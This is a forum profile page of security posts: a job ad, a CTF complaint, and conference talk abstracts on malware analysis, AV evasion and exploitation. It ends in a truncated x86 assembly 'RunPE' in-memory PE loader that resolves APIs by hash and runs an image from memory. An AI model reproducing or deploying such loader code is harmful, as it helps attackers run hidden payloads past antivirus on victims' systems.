Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=1]Incident Management Sr. Advisor[/h] [h=4]Bucharest, Romania[/h] We are currently looking for an Incident Management Sr. Advisor that will be part of Dell's internal security team. Responsibilities: • Respond to critical computer security incidents by collecting, analyzing and preserving digital evidence • Assemble and coordinate with technical teams and third-party vendors to resolve incidents as quickly and efficiently as possible • Communicate status of response, resolution and final root cause analysis to the appropriate stakeholders • Ensure that all incidents are recorded and tracked to meet audit and legal requirements • Conduct root cause analysis to identify gaps and recommendations ultimately remediating risks • Communicate effectively with representatives of the Lines of Business, technology specialists, and vendors • Gather forensic evidence for disciplinary action or criminal investigation • Partner with all business lines to investigate internal code of conduct, fraud and other investigations as instructed by the CISO • Conduct advanced computer and network forensic investigation functions relating to various forms of electronic fraud, identity theft, e-commerce fraud, computer intrusion, theft of information, denial of service, multi-national organized electronic criminal groups, as well as financial fraud investigations • Perform other essential duties as assigned • Some basic system administration duties • Vendor communications for technical support where required Qualifications: Requirements: • 5+ years' experience in IT industry including at least 2 from the Information Security sector with a focus on Incident Response • Emerging information security technologies and development methodologies • UNIX, Linux, and Microsoft operating systems • Security software and tools • PCI compliance • Superior communication, organization, and interpersonal skills and a demonstrated effectiveness in a customer facing role. Company Description With more than 100,000 team members globally, we promote an environment that is rooted in the entrepreneurial spirit in which the company was founded. Dell's team members are committed to serving our communities, regularly volunteering for over 1,500 non-profit organizations. The company has also received many accolades from employer of choice to energy conservation. Our team members follow an open approach to technology innovation and believe that technology is essential for human success. Why work with us? - Life at Dell means collaborating with dedicated professionals with a passion for technology. - When we see something that could be improved, we get to work inventing the solution. - Our people demonstrate our winning culture through positive and meaningful relationships. - We invest in our people and offer a series of programs that enables them to pursue a career that fulfills their potential. - Our team members' health and wellness is our priority as well as rewarding them for their hard work. Link: https://dell.referrals.selectminds.com/jobs/security-analysis-sr-advisor-39919?et=FvAn1Ukf Sau imi dati mie CV-ul daca sunteti interesati si il dau mai departe.
  2. Nytro
    In general, la CTF-uri, apar chestii absurde in functie de cine face challenge-ul: - Daca ii plac anime, baga un text si cica sa iti dai seama de cine stie ce personaj din acel anime - Daca ii place Sasha Grey baga un "Aa oo aaa oo uuuuuu" si trebuie sa iti dai seama de numele filmului (glumesc) - Daca i se scoala sa puna cate un bit pe pozitia 7 dintr-o imagine sa iti dai seama tu de ideea lui de cand era fumat - Daca vrea el sa faca sirul fibbonaci cu numarul pixelilor dintr-o imagine sa iti dai tu seama de asta In fine, cred ca ai inteles ideea. E ceea ce nu imi place mie si cred ca multora nu le place: rezolvarea unei idei STUPIDE, care nu are deloc de-a face cu tehnica sau skill-urile competitorilor. Vor fi astfel de challenge-uri?
  3. Nytro
    Dropping Docs On Darknets: How People Got Caught Adrian Crenshaw ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Most of you have probably used Tor before, but I2P may be unfamiliar. Both are anonymization networks that allow people to obfuscate where their traffic is coming from, and also host services (web sites for example) without it being tied back to them. This talk will give an overview of both, but will focus on real world stories of how people were deanonymized. Example cases like Eldo Kim & the Harvard Bomb Threat, Hector Xavier Monsegur (Sabu)/Jeremy Hammond (sup_g) & LulzSec, Freedom Hosting & Eric Eoin Marques and finally Ross William Ulbricht/“Dread Pirate Roberts” of the SilkRoad, will be used to explain how people have been caught and how it could have been avoided. Bio: Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for awhile (MCSE NT 4, CNE, A+, Network+. i-Net+) but stopped once he had to start paying for the tests himself. He holds a Master of Science in Security Informatics and is also one of the co-founders of Derbycon. Sursa: Dropping Docs On Darknets: How People Got Caught - Adrian Crenshaw (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  4. Nytro
    Thinking Outside The (Sand)Box Kyle Adams ShowMeCon 2014 ShowMeCon 2014 - ShowMeCon Hacking Conference St. Louis Missouri Incorporating sandboxing and heuristic-based malware detection to security solutions is the new black. Unfortunately, malware writers know this too and are designing their exploits to only run once clearing any sandboxes. If they can avoid getting analyzed and detected as malware, they will also avoid having a signature written and published. This seems like bad news for malware protection, but maybe not. It’s possible to trick evasive malware into thinking it’s continually running in a sandbox (even though it’s not) so it never executes its payload. This inoculates targeted machines from malware designed to evade sandbox analysis. My presentation will demonstrate some of the techniques modern malware uses to determine if it is running in a sandbox or being analyzed. I will also share deceptive techniques available to anyone, which can be used to inoculate a machine from being infected by these types of attacks. Thinking Outside the [sand]box. No antivirus necessary. Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus has been on web security threats like SQLi, XSS, CSRF, etc… but more recently he has started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos Web App Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space. Sursa: Thinking Outside The (Sand)Box - Kyle Adams (ShowMeCon 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  5. Nytro
    Bypassing EMET 4.1 Jared DeMott @jareddemott BSides Chicago 2014 The goal of this study is to gauge how difficult it is to bypass the protections offered by EMET, a popular Microsoft zero-day prevention capability. We initially focused on just the ROP protections, but later expanded the study to include a real world example. We were able to bypass EMET’s protections in example code and with a real world browser exploit. The primary novel elements in our research are: Deep study regarding the ROP protections, using example applications to show how to bypass each of the five ROP checks in a generic manner. Detailed real world example showing how to defeat all relevant protections. Look for a new technique to bypass the stack pivot protection, shellcode complete with an EAF bypass, and more. These bypasses leverage generic limitations, and not easily repaired. The impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection. This is true of EMET andother similar userland protections. Sursa: Bypassing EMET 4.1 - Jared DeMott - @jareddemott (BSides Chicago 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  6. Nytro
    The TrueCrypt audit- How it happened and what we found — Kenneth White Circle City Con 2014 Circle City Con Indy's First Hackercon Abstract: TrueCrypt is an open source file and whole disk encryption software package that runs on Windows, Macs, and Linux. It has been downloaded nearly 30 million times, and is one of the most popular security tools used by journalists, human rights activists, and countless organizations around the globe. In the 10 years since its original release by an anonymous development team, however, there had never been a formal cryptanalysis and security audit of the software. This presentation is about how the TrueCrypt Audit Project came to pass and how some of the best security minds, cryptographic engineers and privacy advocates in the world came together to successfully conduct a public, crowd-funded, open technical audit of this software. Details of our findings and the many lessons learned along the way will be presented. Any and all questions will be answered! Sursa: The TrueCrypt audit- How it happened and what we found — Kenneth White (Circle City Con 2014 Videos) (Hacking Illustrated Series InfoSec Tutorial Videos)
  7. Nytro
    Pentesting Layers 2 and 3 Kevin Gennuso and Eric Mikulas Lower level network protocols have been around for decades and haven't changed much in that time. A number of tools to exploit weaknesses in those protocols have been released over the years, and those haven't changed much either. What has changed is the hardware. Routers used to be bulky, expensive, and proprietary. Now they are small, cheap, and open source. What better way is there to attack network gear than with another piece of network gear? This presentation will focus on layer 2 and layer 3 protocols, their weaknesses, and how to protect against exploitation. We'll revisit tools such as hping, Nemesis, Yersinia, and Loki and show how they can be used to attack vulnerable networks. Finally, we'll demonstrate our ports of these tools for use on routers that run OpenWRT. Kevin is a security testing manager and part time packet herder. He has over 17 years of experience in information security and network architecture, and has done work for a number of organizations ranging from dot-com era startups to large financial institutions. Eric is a software developer and pre-"maker" maker. He has been writing code and wielding a soldering iron since second grade. He has over 10 years of experience as a developer and has worked for a variety of companies both as a full-time employee and independent contractor. Sursa: Pentesting Layers 2 and 3 - Kevin Gennuso and Eric Mikulas Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  8. Nytro
    Attacking and Defending Full Disk Encryption Tom Kopchak One of your company’s laptops was just stolen. You know that there was sensitive information on the machine. You also know that full disk encryption was deployed. Is your data safe? Can you prove it? Many organizations are flocking to full disk encryption solutions as a solution to their data security requirements. Unfortunately, many of these installations view the deployment of full disk encryption as a panacea for any and all security concerns for their laptop fleets. All too often, these systems are not properly configured and adequately tested. In this talk, Tom will analyze the challenges associated with attacking and defending systems protected with full disk encryption. Many of the examples provided will draw from Tom's personal experience, including several scenarios where a fully encrypted and powered down system was fully compromised as part of a penetration test. Tom Kopchak is a Senior Security Engineer at Hurricane Labs, an Information Security Firm in Cleveland, Ohio. Tom is an alum of the Rochester Institute of Technology, with a background in Computing Security and Information Security (MS) and Applied Networking and System Administration(BS). Tom’s passion for information security stems from his experiences in the Collegiate Cyber Defense Competition. His research areas include computer forensics and data storage technologies. When he is not working with computers, Tom enjoys composing, music improvisation (Acts of Music), and playing both the piano and organ. Sursa: Attacking and Defending Full Disk Encryption - Tom Kopchak Bsides Cleveland 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
  9. Nytro
    Nmap Class for Hackers For Charity This is the Nmap class the Kentuckiana ISSA put on to support Hackers For Charity. Speakers include Jeremy Druin @webpwnized, Martin Bos @purehate_ and me @irongeek_adc. If you like the videos, please consider donating to Hackers For Charity. Nmap Class HFC Louisville ISSA Intro Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 1 Nmap Class HFC Louisville ISSA TCP IP And Basics Of Nmap Part 2 Nmap Class HFC Louisville ISSA OS And Service Fingerprinting Part 1 Nmap Class HFC Louisville ISSA Kicking Ass With Nmap Nmap Class HFC Louisville ISSA Closing Sursa: Nmap Class for Hackers For Charity - Louisville ISSA (Hacking Illustrated Series InfoSec Tutorial Videos)
  10. Nytro
    Introduction to hacking with PowerShell - Scott Busby Sursa: Introduction to hacking with PowerShell - Scott Busby (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
      • 1
      • Upvote
  11. Nytro
    HTTPS: Now You See Me - Tim Mullican Sursa: HTTPS: Now You See Me - Tim Mullican (BSides Huntsville 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  12. Nytro
    3D Printing for Work and Fun Mirabela Rusu Notacon 11 Sursa: 3D Printing for Work and Fun (temp title) - Mirabela Rusu Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  13. Nytro
    Nindroid: Pentesting Apps for your Android device Michael Palumbo Notacon 11 Synopsis We explore the different “apps” available for the android platform that one can use for Local Area Network (LAN) pen testing and mischief. We will try to cover both the well known and newly available android applications for for basic hacking needs and have a few laughs along the way. Bio Michael is a 31 year old computer researcher, Michael focuses his projects depending upon what his interest may be that week. Sursa: Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  14. Nytro
    Pwning the POS! Mick Douglas Notacon 11 Synopsis Everybody’s talking about the Target breach. However, there’s lots wrong with the retail space… and it’s been this way for quite some time! Focusing on Point of Sale (POS) systems this talk will show you how to exploit friendly the POS ecosystem really is, and how you can help fix things. Bio Mick likes to hack stuff. Of late, this means embedded systems. When he’s not “geeking it up” he goes on hikes and stuff to get away from das Blinkenlights. Sursa: Pwning the POS! - Mick Douglas Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  15. Nytro
    Wireless Mesh Protocols Alex Kot Notacon 11 Synopsis I plan to explain different ad-hoc mesh protocols and the difference between them. I also plan to go indepth with a decentralized approach called Better Approach to Mobile Ad-Hoc Networking (B.A.T.M.A.N.) that will be beneficial in a society absent of net neutrality. Bio IT specialist that currently works at a credit union. Fond of open source software and a hobbyist of all technologies. I am an enthusiast for embedded open source router firmware as you can see on my youtube channel. Sursa: Wireless Mesh Protocols - Alex Kot Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos)
  16. Nytro
    Vaccinating Android Milan Gabor - Danijel Grah Number of mobile applications is rising and Android still holds large market share. As these numbers of applications grow, we need better tools to understand how applications work and to analyze them. There is always a question if we can trust mobile applications to do only that they are allowed to do and if they are really secure when transmitting our personal information to different servers. In the presentation some runtime techniques will be discussed and a tool will be released that offers two approaches to analyze Android applications. Basic principle of first approach is injecting small piece of code into APK and then connect to it and use Java Reflection to runtime modify value, call methods, instantiate classes and create own scripts to automate work. The second approach offers much the same functionality, but can be used without modifying an application. It uses Dynamic Dalvik Instrumentation to inject code at runtime so that modifying of APK's isn't necessary. Tool is Java based and simple to use, but offers quite few new possibilities for security engineers and pentesters. Bio: Milan Gabor is a Founder and CEO of Viris, Slovenian company specialized in information security. He is security professional, pen-tester and researcher. Milan is a distinguished and popular speaker on information security. He has previously been invited to speak at various events at different IT conferences in Slovenia and loves to talk to IT students at different Universities. He also leads teaches ethical hacking. He is always on a hunt for new and uncovered things and he really loves and enjoys his job. Danijel Grah has a Bachelor degree in Computer Science at the University of Ljubljana, Slovenia. He is a Security Consultant at Viris for some time and is involved in penetration testing, security reviews, programming, consulting and research. He has deep understanding into threats, vulnerabilities and trends. He likes to practice Information Security in everyday life. Danijel is devoted to his work, open minded, enjoys new challenges and he never stops studying. Danijel Grah Sursa: Vaccinating Android Milan Gabor - Danijel Grah (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  17. Nytro
    Invasive Roots of Anti-Cheat Software Alissa Torres Some of the most sophisticated rootkit behaviors are implemented by today's anti-cheat gaming software, in a constantly evolving game of cat and mouse. Game hackers often look for flaws in a system or program’s logic, seeking to exploit them for their own performance gains. As cheats evolve to evade detection, so do the anti-cheat software products, employing hooking mechanisms to catch the newest subversions. Often the effectiveness of an anti-cheat implementation will affect legitimate users’ enjoyment (no one likes to play with cheaters, even cheaters themselves!), making it highly profitable for game developers to focus on improving this technology and expediently identifying game hackers. As a natural consequence, anti-cheat software has grown more invasive and intrusive. For example, a recent version of VAC (Valve's Anti-Cheat Software) was found to scrape gamers' system DNS cache in order to spot commercial game cheats and ban users. Just what else is being extricated from our gaming systems and which products are the worst offenders? By analyzing system memory, several anti-cheat software implementations will be isolated. With a cadre of reverse engineers, we will walk through just how these products are monitoring for game hacking behavior and if any of these techniques call into question aspects of their End User License Agreements. Bio: Alissa Torres is a certified SANS instructor, specializing in advanced computer forensics and incident response. Her industry experience includes serving in the trenches as part of the Mandiant Computer Incident Response Team (MCIRT) as an incident handler and working on a internal security team as a digital forensic investigator. She has extensive experience in information security, spanning government, academic, and corporate environments and holds a Bachelors degree from University of Virginia and a Masters from University of Maryland in Information Technology. Alissa has taught as an instructor at the Defense Cyber Investigations Training Academy (DCITA), delivering incident response and network basics to security professionals entering the forensics community. She has presented at various industry conferences and numerous B-Sides events (those being the best events, obviously!). In addition to being a GIAC Certified Forensic Analyst (GCFA), she holds the GCFE, GPEN, GCIH, CISSP, EnCE, and CFCE. Sursa: Invasive Roots of Anti-Cheat Software - Alissa Torres (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  18. Nytro
    Anatomy of memory scraping, credit card stealing POS malware Amol Sarwate Cedit card stealing RAM scraper malware is running amok compromising point-of-sale (POS) systems. Recent breaches have shown that exposure to such attacks is high and there is a lot at risk. This presentation shows how the attack is carried out by looking at the nuts-and-bolts of a home grown malware sample. During the demo we will pretend to be the bad guy and steal information from the belly of the POS process. Then we switch hats, expose the malware to multiple environmental hazards to study its behavior and identify strategies that can be implemented to make it hard for the malware to behave correctly and deter the bad guys. If all goes well, you will walk away with RAM scraping and prevention mojo. Bio: Amol heads Qualys' worldwide security engineering team responsible for vulnerability and compliance research. His team tracks emerging threats and develops software which identifies new vulnerabilities and insecure posture for Qualys’ VM, PC, PCI and QBC services. Amol is a veteran of the security industry and has devoted his career to protecting, securing and educating the community from security threats. Amol has presented his research on Vulnerability Trends, Security Axioms, SCADA security, Malware and other security topics at numerous security conferences, including RSA Conference, BlackHat, Hacker Halted, SecTor, BSides, InfoSec Europe, NullCon, GrrCon, ISSA, Homeland security Network HSNI and FS/ISAC. He regularly contributes to the SANS Top 20 expert consensus identifying the most critical security vulnerabilities. He writes the “HOT or NOT” column for SC Magazine and holds a US patent for Systems and Methods for Performing Remote Configuration Compliance Assessment of a Networked Computer Device Sursa: Anatomy of memory scraping, credit card stealing POS malware - Amol Sarwate (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  19. Nytro
    USB write blocking with USBProxy Dominic Spill USB mass storage devices are some of the most common peripherals in use today. They number in the billions and have become the de-facto standard for offline data transfer. USB drives have also been implicated in malware propagation (BadBIOS) and targeted attacks (Stuxnet). A USB write blocker may help to prevent some of these issues and allow researchers to examine the content of the attempted writes. USBProxy allows us to build an external write blocker using cheap and widely available hardware that will be undetectable by the host system. Bio: Dominic Spill has been building packet sniffers and researching wireless security since 2007. He has been a security researcher and the lead developer for Ubertooth for the past two years while also working on Daisho, FCC.io and USBProxy. Sursa: USB write blocking with USBProxy - Dominic Spill (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  20. Nytro
    The untold story about ATM Malware - Daniel Regalado Everyone talks about ATM Malware, we can see videos in Internet hacking these machines but no one explains HOW an attacker can take control of an ATM and command it to dispense the money at will. Is it possible to control an ATM from a cell phone? What about a Man-in-the-middle attack to intercept the traffic between the ATM and the bank? Come to my talk and learn these and many other techniques used from Venezuela to Russia Hackers that are emptying ATMs without restrictions. Bio: Daniel Regalado aka Danux is a Reverse engineer, Malware and Vulnerability researcher, he was responsible to dissect the latest dangerous ATM malware named Ploutus as well as many other different Advanced Persistent Threats. He is the lead author of Gray Hay Hacking book 4th Edition to be released by the end of 2014. Sursa: The untold story about ATM Malware - Daniel Regalado (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  21. Nytro
    Malware Analysis 101 - N00b to Ninja in 60 Minutes grecs Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the big boys. This presentation covers several analysis environments and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja ( in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis. Bio: Sursa: Malware Analysis 101 - N00b to Ninja in 60 Minutes - grecs (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  22. Nytro
    Evading code emulation: Writing ridiculously obvious malware that bypasses AV Kyle Adams Code emulation, a technology capable of detecting malware for which no signature exists. It’s a powerful step in the right direction for client security, but it’s a long way from mature. This talk will demonstrate how the code emulation engine in Anti-Virus Guard (AVG) can be reverse engineered by progressively testing its features, and ultimately evading detection. The result is a Command-and-Control (C&C) bot, in a non-obfuscated windows shell script, that AVG and many other leading AV engines will not detect. I will propose solutions on how these code emulation environments can be improved, making the detection of zero day malware far more successful going forward. This is not a jab against AVG, as they get enormous credit for including such a powerful tool in a free antivirus client. Bio: Kyle Adams has been involved with security since a very early age. Self-taught, he learned the basics of hacking and security defense strategies long before entering the professional world. Early on, much of his professional focus was on web security threats like SQLi, XSS, CSRF, etc…but more recently he started researching and working on products to defend against malware based threats. Kyle helped build and design the first commercial security solution based on deception and misinformation, evolving the concept of honeypot technology from a purely academic endeavor to a realistic intrusion prevention strategy (Junos WebApp Secure, formerly Mykonos). He is now working on introducing similar deception techniques as a detection and prevention methodology into the malware space. Sursa: Evading code emulation: Writing ridiculously obvious malware that bypasses AV - Kyle Adams (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  23. Nytro
    Hackers vs Auditors - Dan Anderson A view into what hackers are about and what auditors are about, comparison and contrasting. Bio: Dan Anderson has spent his life developing and implementing communications between systems and developing systems and applications in Military, Healthcare, and Mining. First, for the USAF, working on Navigation Systems on various aircraft, then in the Gold Mining industry for RTZ/Kennecott Utah Copper, and finally in the Healthcare Industry for Intermountain Healthcare. He has a background in Electrical Engineering and Chemistry with emphasis in Healthcare Informatics and has specialized in Information Security and Assurance, earning his Certified Information System Auditor (CISA), Certified in Risk and Information Systems Control (CRISC), both from the Information Systems Audit and Control Association (ISACA). Additional certifications include: Certified Ethical Hacker (C|EH), Payment Card Industry Internal Security Assessor (ISA and PCIP), and Information Technology Infrastructure Library (ITIL v3).Dan has worked for Healthcare IT Vendors such as Cerner, GE, and IDX, and consults globally in Information Systems Security, Regulatory Compliance, Information Systems Audit, and Intellectual Property Assurance. Some of Dan’s work includes consulting premier teaching hospitals such as Stanford Medical Center, Harvard’s Boston Children’s Hospital, University of Utah Hospital, and large Integrated Delivery Networks such as Sutter Health, Catholic Healthcare West, Kaiser Permanente, Veteran’s Health Administration, and Intermountain Healthcare. Dan is a Board member and current President of the Utah chapter of the Information Systems Audit and Control Association, (ISACA), a Board member of UtahSec.org, a Board member and Vice President of F.B.I. Infragard Salt Lake City Chapter, member of F.B.I. Citizen’s Academy Alumni Association, and member of the Security Technical Committee of Health Level Seven (HL7). Board Member, Center for Excellence in Higher Education Program Advisory Committee. Board Member, Utah Valley University Cyber Security Program Community Advisory Board. Board Member University of Utah Eccles School of Business Masters in Information Systems (MSIS) Program Advisory Board.Dan has served in positions as President, CEO, CIO, CISO, and Director for various companies, is currently a Chief Information Security Officer and Senior Management Consultant for Spectra Consulting Group, and also an Information Security Consultant for Intermountain Healthcare.In his spare time Dan volunteers as an Ice Hockey coach for over 14 years in various youth hockey associations in Utah, has served as Head coach for Riverton High School and Midget Major AA travel teams, earning USA Hockey’s highest coaching level 5 Master Coach.Dan lives in Murray Utah. Sursa: Hackers vs Auditors - Dan Anderson (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  24. Nytro
    Attacking Drupal Greg Foss Drupal is a very popular content management system that has been widely adopted by government agencies, major businesses, social networks, and more -- underscoring why understanding how Drupal works and properly securing these applications is of the utmost importance. This talk focuses on the penetration tester's perspective of Drupal and dives into streamlining the assessment and remediation of commonly observed application and configuration flaws by way of custom exploit code and security checklists, all of which are open-source and can be downloaded and implemented following the presentation. Bio: Greg Foss is a Senior Security Research Engineer with the LogRhythm Labs Threat Intelligence Team, where he focuses on developing defensive strategies, tools and methodologies to counteract advanced attack scenarios. He has over 7 years of experience in the Information Security industry with an extensive background in Security Operations, focusing on Penetration Testing and Web Application Security. Greg holds multiple industry certifications including the OSCP, GPEN, GWAPT, GCIH, and C|EH, among others. Sursa: Attacking Drupal - Greg Foss (BSides Las Vegas 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
  25. Nytro
    [h=5][asm x86] RunPE shellcode[/h] use32 format binary include 'win32a.inc' include 'pe.inc' struct stAPITable pVirtualAllocEx_kernel32 dd ? pLoadLibraryA_kernel32 dd ? pVirtualProtect_kernel32 dd ? ends proc _GetDeltaProc, pPEImage stdcall RunPE_main, [pPEImage] .Delta: ret endp proc RunPE_main pPEImage local pFileHeader:DWORD local pNewPEPlace:DWORD local APITable[0x14]:BYTE local pAPITable:DWORD local iResult:DWORD local huser32:DWORD local szuser32[0xb]:BYTE local pGetHashSz:DWORD local hkernel32:DWORD push edi push ecx push eax mov eax, [ebp+04h] sub eax, _GetDeltaProc.Delta push eax pop ebx lea ebx, [ebx+GetHashSz] push ebx pop DWord [pGetHashSz] call GetK32 mov DWord [hkernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x632466f0 mov DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x15f8ef80 mov DWord [APITable+stAPITable.pVirtualProtect_kernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x71e40722 mov DWord [APITable+stAPITable.pLoadLibraryA_kernel32], eax lea ecx, [APITable] mov DWord [pAPITable], ecx stdcall verifyPE, [pPEImage] cmp eax, 0x0 jz .End push eax pop DWord [pFileHeader] stdcall DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], -1, NULL, DWord [eax+IMAGE_OPTIONAL_HEADER32.SizeOfImage+sizeof.IMAGE_FILE_HEADER],\ MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN, PAGE_READWRITE mov [pNewPEPlace], eax stdcall loadFile, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace] stdcall loadImportTable, [pAPITable], [pGetHashSz], [pNewPEPlace] test eax, eax jz .End stdcall reloc_fixup, [pNewPEPlace], [pFileHeader] stdcall setPermissions, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace] mov esi, [pFileHeader] mov eax, [esi+sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint] add eax, [pNewPEPlace] jmp eax .End: pop eax pop ecx pop edi mov eax, DWord [iResult] ret endp proc verifyPE pImagePE local iResult:DWORD pusha push DWord [pImagePE] pop edx cmp Word [edx], WORD 0x5a4d jnz .Exit mov ecx, DWord [edx+IMAGE_DOS_HEADER.e_lfanew] add edx, ecx cmp DWord [edx], DWORD 0x4550 jne .Exit lea edx, [edx+0x4] .Exit: mov DWord [iResult], edx popa push DWord [iResult] pop eax ret endp proc loadSection pImageSectionHeader:DWORD, pImageBase:DWORD, pBase:DWORD pushad mov edx, [pImageSectionHeader] mov esi, [pImageBase] add esi, [edx+IMAGE_SECTION_HEADER.PointerToRawData] mov edi, [edx+IMAGE_SECTION_HEADER.VirtualAddress] add edi, [pBase] mov ecx, [edx+IMAGE_SECTION_HEADER.SizeOfRawData] cld rep movsb popad ret endp proc loadFile pAPITable:DWORD, pImageFileHeader:DWORD, pImageBase, pBase:DWORD local .iSectNum:DWORD, .pImageBase:DWORD, .pImageOptionalHeader:DWORD, .pSectionHeaders:DWORD, .iPEHeaderSize:DWORD pushad mov edx, [pImageFileHeader] movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections] mov [.iSectNum], eax lea edx, [edx+sizeof.IMAGE_FILE_HEADER] lea ebx, [edx + IMAGE_OPTIONAL_HEADER32.DataDirectory] mov eax, [edx + IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes] mov edx, sizeof.IMAGE_DATA_DIRECTORY mul edx add eax, ebx mov [.pSectionHeaders], eax mov eax, sizeof.IMAGE_SECTION_HEADER mov edx, [.iSectNum] mul edx add eax, [.pSectionHeaders] sub eax, [pImageBase] mov ecx, eax mov edi, [pBase] mov esi, [pImageBase] rep movsb mov ecx, [.iSectNum] mov ebx, [.pSectionHeaders] .load_section_loop: stdcall loadSection, ebx, [pImageBase], [pBase] add ebx, sizeof.IMAGE_SECTION_HEADER dec ecx jnz .load_section_loop .Exit: popad ret endp proc setPermissions APITable:DWORD, pImageFileHeader:DWORD, pImageBase:DWORD, pBase:DWORD local .number_of_sections:DWORD, .image_base:DWORD, .section_headers:DWORD, .pe_header_size:DWORD, .vprotect_ret:DWORD, .retval:DWORD pushad xor eax, eax mov [.retval], eax mov edx, [pImageFileHeader] movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections] mov [.number_of_sections], eax add edx, sizeof.IMAGE_FILE_HEADER mov eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase] mov [.image_base], eax lea ebx, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory] mov eax, [edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes] mov edx, sizeof.IMAGE_DATA_DIRECTORY mul edx add eax, ebx mov [.section_headers], eax mov eax, sizeof.IMAGE_SECTION_HEADER mov edx, [.number_of_sections] mul edx add eax, [.section_headers] mov ebx, [pImageBase] sub eax, ebx mov [.pe_header_size], eax mov edx, [APITable] lea eax, [.vprotect_ret] stdcall dword [edx+stAPITable.pVirtualProtect_kernel32], [pBase], [.pe_header_size], PAGE_READONLY, eax test eax, eax jz .exit mov ecx, [.number_of_sections] mov ebx, [.section_headers] .load_section_loop: stdcall setSection, [APITable], ebx, [pBase], [pImageBase] test eax, eax jz .exit add ebx, sizeof.IMAGE_SECTION_HEADER loop .load_section_loop inc [.retval] .exit: popad mov eax, [.retval] ret endp proc setSection APITable:DWORD, pSectionHeader:DWORD, pBase:DWORD, pImageBase:DWORD local .section_flags:DWORD, .retval:DWORD, .vprotect_ret:DWORD pushad xor ebx, ebx mov [.retval], ebx mov edx, [pSectionHeader] ;section execute/read/write? mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE jne .no_execute_read_write mov eax, PAGE_EXECUTE_READWRITE mov [.section_flags],eax jmp .set_memory .no_execute_read_write: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ jne .no_execute_read mov eax, PAGE_EXECUTE_READ mov [.section_flags],eax jmp .set_memory .no_execute_read: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE cmp ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE jne .no_read_write mov eax, PAGE_READWRITE mov [.section_flags], eax jmp .set_memory .no_read_write: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_READ cmp ebx, IMAGE_SCN_MEM_READ jne .no_read mov eax, PAGE_READONLY mov [.section_flags], eax jmp .set_memory .no_read: mov eax, PAGE_NOACCESS mov [.section_flags],eax .set_memory: mov edx, [pSectionHeader] mov eax, [edx + IMAGE_SECTION_HEADER.VirtualAddress] add eax, [pBase] mov ecx, [APITable] lea edi, [.vprotect_ret] stdcall DWord [ecx + 